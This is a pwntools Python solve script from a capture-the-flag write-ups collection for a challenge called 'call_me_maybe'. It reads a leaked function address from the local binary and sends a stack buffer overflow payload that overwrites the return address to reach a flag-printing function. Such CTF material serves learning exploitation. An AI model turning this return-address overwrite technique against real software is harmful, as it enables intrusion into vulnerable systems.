write-ups-challenges-2019-2020/call_me_maybe/solve/pwn.py

from pwn import *

offset    = 32

r = process('../call_me_maybe')
stdout  = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)

print("Pointer is %x" % addr)

exploit = "A"*offset + "B"*8 + p64(addr) 
r.sendline(exploit)

print(r.recv())